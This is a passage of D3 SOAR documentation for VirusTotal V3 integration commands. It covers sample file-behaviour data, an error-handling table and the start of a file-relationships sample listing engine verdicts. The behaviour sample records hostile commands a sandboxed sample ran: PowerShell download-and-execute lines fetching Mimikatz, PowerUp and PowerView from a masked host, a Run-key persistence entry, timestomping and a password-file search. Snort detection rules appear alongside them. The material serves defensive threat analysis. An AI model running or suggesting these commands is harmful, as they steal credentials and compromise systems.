'C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Configuration\\4beb1eeca20b27d4bd1bb9880f03cc2a\\System.Configuration.ni.dll.aux', 'C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Xml\\', 'C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Xml\\5ee35debfc22f727e70e4479ddcbc045\\System.Xml.ni.dll', 'C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Xml\\5ee35debfc22f727e70e4479ddcbc045\\System.Xml.ni.dll.aux', 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\nlssorting.dll', 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\SortDefault.nlp', 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config', 'C:\\Users\\admin', 'C:\\Users\\\\AppData\\Roaming', 'C:\\Users\\Default\\AppData\\Roaming', 'C:\\Windows\\system32\\bcrypt.dll', 'C:\\Windows\\system32\\CRYPTSP.dll', 'C:\\Windows\\system32\\rsaenh.dll', 'C:\\Windows\\system32\\dhcpcsvc6.DLL', 'C:\\Windows\\system32\\dhcpcsvc.DLL', '\\DEVICE\\NETBT_TCPIP_{F0C53D6E-70E2-4027-95D3-23510DC2383A}', '\\DEVICE\\NETBT_TCPIP_{846EE342-7039-11DE-9D20-806E6F6E6963}', '\\DEVICE\\NETBT_TCPIP_{83811ED5-13C8-4FB1-B6A3-6B9E83E6B1EE}', 'C:\\Windows\\system32\\', 'C:\\Windows\\system32', 'C:\\Windows\\system32\\PROPSYS.dll', 'C:\\Windows\\system32\\SHELL32.dll', 'C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757', 'C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\\comctl32.dll', 'C:\\Windows\\WindowsShell.Manifest', 'C:\\Windows\\system32\\apphelp.dll', 'C:\\Windows\\System32\\ieframe.dll', 'C:\\Windows\\System32\\api-ms-win-downlevel-shell32-l1-1-0.dll', 'C:\\Windows\\system32\\reg.exe', 'MountPointManager', 'C:\\Windows', 'C:\\Windows\\System32', 'C:\\Users\\\\AppData\\Local\\Microsoft\\Windows\\Caches', 'C:\\Users\\\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db', 'C:\\Windows\\system32\\ntmarta.dll', 'C:\\Users\\\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000012.db', 'C:\\Users\\\\Desktop\\desktop.ini', 'C:\\Windows\\SysWOW64\\propsys.dll', 'C:\\Windows\\system32\\propsys.dll', 'C:\\Windows\\system32\\urlmon.dll', 'C:\\Users\\\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files', 'C:\\Users\\\\AppData\\Roaming\\Microsoft\\Windows\\Cookies', 'C:\\Windows\\System32\\reg.exe', 'C:\\Windows\\', 'C:\\Windows\\System32\\', 'C:\\Windows\\System32\\reg.exe:Zone.Identifier', 'STORAGE#Volume#{908002c8-ddb3-11eb-b547-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}', 'STORAGE#Volume#{908002c8-ddb3-11eb-b547-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}', 'C:\\Windows\\system32\\systeminfo.exe', 'C:\\Windows\\System32\\systeminfo.exe', 'C:\\Windows\\System32\\systeminfo.exe:Zone.Identifier', 'C:\\Windows\\system32\\wbem\\wbemprox.dll', 'C:\\Windows\\system32\\wbemcomn2.DLL', 'C:\\Windows\\system32\\wbem\\Logs', 'C:\\Windows\\System32\\CRYPTSP.dll', 'C:\\Windows\\System32\\RpcRtRemote.dll', 'C:\\Windows\\system32\\wbem\\wbemsvc.dll', 'C:\\Windows\\system32\\wbem\\fastprox.dll', 'C:\\Windows\\system32\\NTDSAPI.dll', '\\SystemRoot\\AppPatch\\AppPatch64\\sysmain.sdb', '?\\Volume{2a34cd26-a9ad-11ea-aa93-806e6f6e6963}', 'C:\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe', 'C:\\Windows\\system32\\powershell.exe'], 'processes_created': ['', '\\conhost.exe', '\\reg.exe', '\\systeminfo.exe', '\\wbem\\wmiprvse.exe', '\\windowspowershell\\v1.0\\powershell.exe', '\\cmd.exe', 'C:\\Windows\\System32\\reg.exe add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v d3commander /d C:\\Windows\\commander.exe /f', 'C:\\Windows\\System32\\systeminfo.exe /fo csv', 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -command $file=(gi c:\\windows\\commander.exe.config);$date=01/03/2000 12:12 pm;$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date', "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass -command IEX (New-Object Net.WebClient).DownloadString('http://***.***.***.***/PowerUp.ps1'); Get-ServiceUnquoted >c:\\windows\\out1.txt", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass -command IEX (New-Object Net.WebClient).DownloadString('http://***.***.***.***/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds >c:\\windows\\out2.txt", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass -command IEX (New-Object Net.WebClient).DownloadString('http://***.***.***.***/PowerView.ps1'); Get-NetComputer >c:\\windows\\out3.txt", 'C:\\Windows\\System32\\reg.exe query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Profilelist /s', 'C:\\Windows\\System32\\cmd.exe /c dir c:\\users\\administrator\\*password* /b /s /a-d'], 'registry_keys_set': [{'key': '\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet', 'value': '0x00000000'}, {'key': '\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect', 'value': '0x00000001'}, {'key': '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\d3commander', 'value': '%WINDIR%\\commander.exe'}, {'key': '\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0009\\NetCfgInstanceId', 'value': '{0F83F400-B686-45FE-8878-A1C56292B844}'}, {'key': '\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0009\\Linkage\\RootDevice', 'value': '{0F83F400-B686-45FE-8878-A1C56292B844}'}, {'key': '\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0009\\Linkage\\UpperBind', 'value': 'TCPIP6TUNNEL\\nTcpip6'}, {'key': '\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0009\\Linkage\\Export', 'value': '\\Device\\{0F83F400-B686-45FE-8878-A1C56292B844}'}, {'key': '\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0007\\Linkage\\FilterList', 'value': '{6A52BE73-EC8E-4F63-A268-7517A50DCB38}-{B5F4D659-7DAA-4565-8E41-BE220ED60542}-0000\\n{6A52BE73-EC8E-4F63-A268-7517A50DCB38}-{B70D6460-3635-4D42-B866-B8AB1A24454C}-0000'}, {'key': '\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0008\\Linkage\\FilterList', 'value': '{2CAA64ED-BAA3-4473-B637-DEC65A14C8AA}-{B5F4D659-7DAA-4565-8E41-BE220ED60542}-0000'}, {'key': '\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0006\\Linkage\\FilterList', 'value': '{5BF54C7E-91DA-457D-80BF-333677D7E316}-{B5F4D659-7DAA-4565-8E41-BE220ED60542}-0000'}, {'key': '\\System\\CurrentControlSet\\Control\\Class\\{4d36e972-e325-11ce-bfc1-08002be10318}\\0005\\Linkage\\FilterList', 'value': '{9A399D81-2EAD-4F23-BCDD-637FC13DCD51}-{B5F4D659-7DAA-4565-8E41-BE220ED60542}-0000'}, {'key': '\\System\\CurrentControlSet\\Control\\Network\\{4D36E972-E325-11CE-BFC1-08002BE10318}\\{0F83F400-B686-45FE-8878-A1C56292B844}\\Connection\\Name', 'value': 'isatap.{6A52BE73-EC8E-4F63-A268-7517A50DCB38}'}, {'key': '\\System\\CurrentControlSet\\Control\\Nsi\\{eb004a11-9b1a-11d4-9123-0050047759bc}\\10\\0000000400008300', 'value': '\\xae\\x01\\x84\\x04\\x5a\\x00\\x69\\x00\\x73\\x00\\x61\\x00\\x74\\x00\\x61\\x00\\x70\\x00\\x2e\\x00\\x7b\\x00\\x36\\x00\\x41\\x00\\x35\\x00\\x32\\x00\\x42\\x00\\x45\\x00\\x37\\x00\\x33\\x00\\x2d\\x00\\x45\\x00\\x43\\x00\\x38\\x00\\x45\\x00\\x2d\\x00\\x34\\x00\\x46\\x00\\x36\\x00\\x33\\x00\\x2d\\x00\\x41\\x00\\x32\\x00\\x36\\x00\\x38\\x00\\x2d\\x00\\x37\\x00\\x35\\x00\\x31\\x00\\x37\\x00\\x41\\x00\\x35\\x00\\x30\\x00\\x44...'}, {'key': '\\Software\\Classes\\Local Settings\\MuiCache\\130\\52C64B7E\\LanguageList', 'value': 'en-US\\nen'}, {'key': '\\Software\\Classes\\Local Settings\\MuiCache\\130\\52C64B7E\\@\\mlang.dll,-4386', 'value': 'English (United States)'}, {'key': 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\d3commander', 'value': 'C:\\Windows\\commander.exe'}, {'key': 'HKLM\\SOFTWARE\\Microsoft\\Windows Media Player NSS\\3.0\\Servers\\A70D59A1-8EAD-4F40-AAAB-FBFC460800A4\\FriendlyName', 'value': 'WORK: admin:'}], 'mutexes_opened': ['\\Sessions\\1\\BaseNamedObjects\\RasPbFile', '\\Sessions\\1\\BaseNamedObjects\\Global\\.net clr networking'], 'tags': ['DIRECT_CPU_CLOCK_ACCESS', 'CHECKS_NETWORK_ADAPTERS', 'DETECT_DEBUG_ENVIRONMENT', 'RUNTIME_MODULES'], 'registry_keys_deleted': ['\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass', '\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass', '\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName', '\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName', '\\System\\CurrentControlSet\\Control\\Network\\NetCfgLockHolder'], 'text_highlighted': [' ', 'Loading Operating System Information ...', 'Loading Computer Information ...', 'Loading Processor Information ...', 'Loading BIOS Information ...', 'Loading Input Locale Information ...', 'Loading TimeZone Information ...', 'Loading Profile Information ...', '\n', 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\C', ' ', 'ProfilesDirectory', 'REG_EXPAND_SZ', '%SystemDrive%\\Users', 'Default', '%SystemDrive%\\Users\\Default', 'Public', '%SystemDrive%\\Users\\Public', 'ProgramData', '%SystemDrive%\\ProgramData', 'Flags', 'REG_DWORD', '0xc', 'State', '0x0', 'RefCount', '0x1', 'Sid', 'REG_BINARY', '01', '00', '05', '12', 'ProfileImagePath', '%systemroot%\\system32\\config\\systemprofile', 'C:\\Windows\\ServiceProfiles\\LocalService', 'C:\\Windows\\ServiceProfiles\\NetworkService', 'C:\\Users\\admin', '0x100', '15', '91', 'D8', '3B', 'DD', '0D', '6E', 'F4', '28', '27', '09', '84', '44', 'E9', '03', 'ProfileLoadTimeLow', 'ProfileLoadTimeHigh', "gi : Cannot find path 'C:\\windows\\commander.exe.co", 'exist.', 'At line:1 char:8', '+ $file=(gi c:\\windows\\commander.exe.config);$date', '+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~', ' + CategoryInfo : ObjectNotFound: (C:\\', ' :String) [Get-Item], ItemNotFoundException', ' + FullyQualifiedErrorId : PathNotFound,Microso', ' emCommand', ' ', "The property 'LastWriteTime' cannot be found on th", 'property exists and can be set.', 'At line:1 char:72', "+ ... config);$date='01/03/2000 12:12 pm';$http://file.La ", '+ ~~~~~~~~', ' + CategoryInfo : InvalidOperation: (:', ' + FullyQualifiedErrorId : PropertyNotFound', "The property 'LastAccessTime' cannot be found on t", 'At line:1 char:98', "+ ... 2:12 pm';$file.LastWriteTime=$date;$file.Las", '+ ~~~~~~~~~', "The property 'CreationTime' cannot be found on thi", 'At line:1 char:125', '+ ... stWriteTime=$date;$file.LastAccessTime=$date', '+ ', 'Loading Pagefile Information ...', 'Loading Hotfix Information ...', 'Loading Network Card Information ...', '"Host Name"', ',', '"OS Name"', '"OS Version"', '"OS Manufacturer"', '"OS Configuration"', '"OS Build Type"', '"Registered Owner"', '"Registered Organization"', '"Product ID"', '"Original Install Date"', '"System Boot Time"', '"System Manufacturer"', '"System Model"', '"System Type"', '"Processor(s)"', '"BIOS Version"', '"Windows Directory"', '"System Directory"', '"Boot Device"', '"System Locale"', '"Input Locale"', '"Time Zone"', '"Total Physical Memory"', '"Available Physical Memory"', '"Virtual Memory: Max Size"', '"Virtual Memory: Available"', '"Virtual Memory: In Use"', '"Page File Location(s)"', '"Domain"', '"Logon Server"', '"Hotfix(s)"', '"Network Card(s)"', '"', 'WORK', 'Microsoft Windows 7 Professional ', '6.1.7601 Service Pack 1 Build 7601', 'Microsoft Corporation', 'Standalone Workstation', 'Multiprocessor Free', 'admin', '55041-007-2508015-86191', '6/8/2020, 3:35:41 AM', '7/5/2021, 10:10:36 AM', 'QEMU', 'Standard PC (i440FX + PIIX, 1996)', 'x64-based PC', '2 Processor(s) Installed.,[01]: Intel64 Family 6 M', 'SeaBIOS 1.10.2-1, 4/1/2014', 'C:\\Windows', 'C:\\Windows\\system32', '\\Device\\HarddiskVolume1', 'en-us;English (United States)', '(UTC-08:00) Pacific Time (US & Canada)', '2,047 MB', '1,291 MB', '4,095 MB', '3,414 MB', '681 MB', 'C:\\pagefile.sys', 'WORKGROUP', 'Exception calling "DownloadString" with "1" argume', 'the remote server"', 'At line:1 char:1', "+ IEX (New-Object Net.WebClient).DownloadString('h", '+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~', ' + CategoryInfo : NotSpecified: (:) []', ' + FullyQualifiedErrorId : WebException', "Invoke-Mimikatz : The term 'Invoke-Mimikatz' is no", 'a cmdlet, function, script file, or operable progr', "Get-ServiceUnquoted : The term 'Get-ServiceUnquote", 'name of a cmdlet, function, script file, or operab', 'spelling of the name, or if a path was included, v', 'correct and try again.', 'At line:1 char:84', "+ ... ring('http://***.***.***.***/PowerUp.ps1'); Ge", '+ ~~', ' + CategoryInfo : ObjectNotFound: (Get', ' CommandNotFoundException', 'the name, or if a path was included, verify that t', 'again.', 'At line:1 char:92', "+ ... ('http://***.***.***.***/Invoke-Mimikatz.ps1')", ' + CategoryInfo : ObjectNotFound: (Inv', ' mandNotFoundException', ' + FullyQualifiedErrorId : CommandNotFoundExcep', 'Commander.exe', 'C:\\Windows\\system32\\cmd.exe'], 'ids_alerts': [{'rule_category': 'misc-activity', 'rule_url': 'https://www.snort.org/downloads/#rule-downloads ', 'alert_severity': 'low', 'rule_msg': 'PROTOCOL-ICMP PING Windows', 'rule_source': 'Snort registered user ruleset', 'rule_raw': 'alert icmp $EXTERNAL_NET any -> $HOME_NET any ( msg:"PROTOCOL-ICMP PING Windows"; itype:8; content:"abcdefghijklmnop",depth 16; metadata:ruleset community; classtype:misc-activity; sid:382; rev:11; )', 'rule_id': '1:382'}, {'rule_category': 'successful-recon-limited', 'alert_severity': 'medium', 'rule_msg': 'PROTOCOL-ICMP Unusual PING detected', 'rule_raw': 'alert icmp $HOME_NET any -> $EXTERNAL_NET any ( msg:"PROTOCOL-ICMP Unusual PING detected"; icode:0; itype:8; fragbits:!M; content:!"ABCDEFGHIJKLMNOPQRSTUVWABCDEFGHI",depth 32; content:!"0123456*****abcdefghijklmnopqrstuv",depth 32; content:!"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE",depth 36; content:!"WANG2"; content:!"cacti-monitoring-system",depth 65; content:!"SolarWinds",depth 72; metadata:policy max-detect-ips drop,ruleset community; reference:url,krebsonsecurity.com/2014/01/a-closer-look-at-the-target-malware-part-ii/; reference:url,krebsonsecurity.com/2014/01/a-first-look-at-the-target-intrusion-malware/; classtype:successful-recon-limited; sid:29456; rev:3; )', 'rule_references': ['https://krebsonsecurity.com/2014/01/a-closer-look-at-the-target-malware-part-ii/ ', 'https://krebsonsecurity.com/2014/01/a-first-look-at-the-target-intrusion-malware/ '], 'rule_source': 'Snort registered user ruleset', 'rule_url': 'https://www.*****.***/***** ', 'rule_id': '1:29456'}, {'rule_category': 'misc-activity', 'rule_url': 'https://www.*****.***/***** ', 'alert_severity': 'low', 'rule_msg': 'PROTOCOL-ICMP PING', 'rule_source': 'Snort registered user ruleset', 'rule_raw': 'alert icmp $EXTERNAL_NET any -> $HOME_NET any ( msg:"PROTOCOL-ICMP PING"; icode:0; itype:8; metadata:ruleset community; classtype:misc-activity; sid:384; rev:8; )', 'rule_id': '1:384'}, {'rule_category': 'misc-attack', 'alert_severity': 'medium', 'rule_msg': 'SERVER-OTHER MRLG fastping echo reply memory corruption attempt', 'tags': ['cve-2014-3931'], 'rule_raw': 'alert icmp $EXTERNAL_NET any -> $HOME_NET any ( msg:"SERVER-OTHER MRLG fastping echo reply memory corruption attempt"; icode:0; itype:0; content:!"ABCDEFGHIJKLMNOPQRSTUVWABCDEFGHI",depth 32; content:!"0123456*****abcdefghijklmnopqrstuv",depth 32; content:!"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE",depth 36; byte_test:4,>,1000000,8,little; metadata:policy max-detect-ips drop; reference:cve,2014-3931; reference:url,mrlg.op-sec.us/; reference:url,s3.eurecom.fr/cve/CVE-2014-3931.txt; classtype:misc-attack; sid:31767; rev:2; )', 'rule_references': ['https://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-3931 ', 'https://mrlg.op-sec.us/ ', 'https://s3.eurecom.fr/cve/CVE-2014-3931.txt'], 'rule_source': 'Snort registered user ruleset', 'rule_url': 'https://www.*****.***/***** ', 'rule_id': '1:31767'}, {'rule_category': 'misc-activity', 'rule_url': 'https://www.*****.***/***** ', 'alert_severity': 'low', 'rule_msg': 'PROTOCOL-ICMP Echo Reply', 'rule_source': 'Snort registered user ruleset', 'rule_raw': 'alert icmp $EXTERNAL_NET any -> $HOME_NET any ( msg:"PROTOCOL-ICMP Echo Reply"; icode:0; itype:0; metadata:ruleset community; classtype:misc-activity; sid:408; rev:8; )', 'rule_id': '1:408'}, {'rule_category': 'non-standard-protocol', 'rule_url': 'https://www.*****.***/***** ', 'alert_severity': 'medium', 'rule_msg': 'DELETED BAD TRAFFIC Non-Standard IP protocol', 'rule_source': 'Snort registered user ruleset', 'rule_raw': 'alert ip $EXTERNAL_NET any -> $HOME_NET any ( msg:"DELETED BAD TRAFFIC Non-Standard IP protocol"; ip_proto:!1; ip_proto:!2; ip_proto:!47; ip_proto:!50; ip_proto:!51; ip_proto:!6; ip_proto:!89; classtype:non-standard-protocol; sid:1620; rev:6; )', 'rule_id': '1:1620'}, {'rule_category': 'bad-unknown', 'alert_severity': 'medium', 'rule_msg': 'PROTOCOL-DNS SPOOF query response with TTL of 1 min. and no authority', 'rule_raw': 'alert udp $EXTERNAL_NET 53 -> $HOME_NET any ( msg:"PROTOCOL-DNS SPOOF query response with TTL of 1 min. and no authority"; flow:to_client; content:"|81 80|",depth 4,offset 2,fast_pattern; byte_test:2,>,0,0,relative,big; byte_test:2,>,0,2,relative,big; content:"|00 00 00 00|",within 4,distance 4; content:"|C0 0C 00 01 00 01|",distance 0; byte_test:4,<,61,0,relative,big; byte_test:4,>,0,0,relative,big; metadata:policy max-detect-ips drop,ruleset communit |
Error Handling
If the Return Data is Partially Successful or Failed, an Error tab will appear in the Test Result window.
The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.
Parts in Error | Description | Example |
Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Get File Behavior Summaries failed. |
Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the VirusTotal V3 portal. Refer to the VirusTotal API Errors for details. | Status Code: 404. |
Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: File Hash Not Found. |
Error Sample Data Get File Behavior Summaries failed. Status Code: 404. Message: File Hash Not Found. |
Get File Relationships
Retrieves objects related to the specified files.
Input
Input Parameter | Required/Optional | Description | Example |
File Hashes | Required | The file hash function values (SHA-256, SHA-1 or MD5) of the files to retrieve related objects. |
JSON
|
Relationship | Required | The relationship between the specified file hashes and the related objects to return. Note: Relationship options labeled with “(Enterprise)” (e.g. Download_files (Enterprise)) can only be used with a premium VirusTotal API connection. | Contacted_ips |
Output
The primary response data from the API request.
D3 enriches the raw data from the original VirusTotal API response by adding the file_hash field to indicate your input File Hashes.
SAMPLE DATA
[
{
"file_hash": "*****",
"meta": {
"count": 3
},
"data": [
{
"attributes": {
"regional_internet_registry": "ARIN",
"jarm": "*****",
"network": "***.***.***.***/**",
"last_https_certificate_date": 1625850459,
"tags": [],
"country": "US",
"as_owner": "Akamai International B.V.",
"last_analysis_stats": {
"harmless": 76,
"malicious": 0,
"suspicious": 0,
"undetected": 9,
"timeout": 0
},
"asn": *****,
"whois_date": 1624695500,
"last_analysis_results": {
"CMC Threat Intelligence": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CMC Threat Intelligence"
},
"DNS8": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "DNS8"
},
"Lionic": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Lionic"
},
"Snort IP sample list": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Snort IP sample list"
},
"AICC (MONITORAPP)": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AICC (MONITORAPP)"
},
"benkow.cc": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "benkow.cc"
},
"VX Vault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "VX Vault"
},
"securolytics": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "securolytics"
},
"MalwarePatrol": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwarePatrol"
},
"Armis": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Armis"
},
"MalBeacon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalBeacon"
},
"Comodo Valkyrie Verdict": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Comodo Valkyrie Verdict"
},
"PhishLabs": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "PhishLabs"
},
"EmergingThreats": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EmergingThreats"
},
"zvelo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "zvelo"
},
"K7AntiVirus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "K7AntiVirus"
},
"Nucleon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Nucleon"
},
"Virusdie External Site Scan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Virusdie External Site Scan"
},
"CINS Army": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CINS Army"
},
"Spamhaus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Spamhaus"
},
"Quttera": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quttera"
},
"Yandex Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Yandex Safebrowsing"
},
"SafeToOpen": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SafeToOpen"
},
"MalwareDomainList": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwareDomainList"
},
"CyberCrime": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CyberCrime"
},
"Lumu": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Lumu"
},
"Google Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Google Safebrowsing"
},
"FraudScore": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "FraudScore"
},
"Kaspersky": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Kaspersky"
},
"BitDefender": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BitDefender"
},
"Emsisoft": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Emsisoft"
},
"GreenSnow": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "GreenSnow"
},
"G-Data": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "G-Data"
},
"Segasec": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Segasec"
},
"OpenPhish": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "OpenPhish"
},
"Sucuri SiteCheck": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sucuri SiteCheck"
},
"AutoShun": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "AutoShun"
},
"Trustwave": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Trustwave"
},
"Web Security Guard": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Web Security Guard"
},
"CyRadar": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CyRadar"
},
"desenmascara.me": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "desenmascara.me"
},
"ADMINUSLabs": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ADMINUSLabs"
},
"Scantitan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Scantitan"
},
"IPsum": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "IPsum"
},
"Dr.Web": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Dr.Web"
},
"AlienVault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AlienVault"
},
"Sophos": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sophos"
},
"malwares.com URL checker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "malwares.com URL checker"
},
"Abusix": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Abusix"
},
"Phishtank": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishtank"
},
"EonScope": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EonScope"
},
"Malwared": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Malwared"
},
"Avira": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Avira"
},
"NotMining": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "NotMining"
},
"Cyan": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Cyan"
},
"Antiy-AVL": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Antiy-AVL"
},
"SCUMWARE.org": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SCUMWARE.org"
},
"Spam404": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Spam404"
},
"MalSilo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalSilo"
},
"ESTsecurity-Threat Inside": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ESTsecurity-Threat Inside"
},
"Certego": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Certego"
},
"ESET": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ESET"
},
"Threatsourcing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Threatsourcing"
},
"URLhaus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "URLhaus"
},
"SecureBrain": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SecureBrain"
},
"Webroot": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Webroot"
},
"PREBYTES": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "PREBYTES"
},
"StopForumSpam": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "StopForumSpam"
},
"Blueliv": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Blueliv"
},
"Hoplite Industries": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Hoplite Industries"
},
"Netcraft": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Netcraft"
},
"CRDF": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CRDF"
},
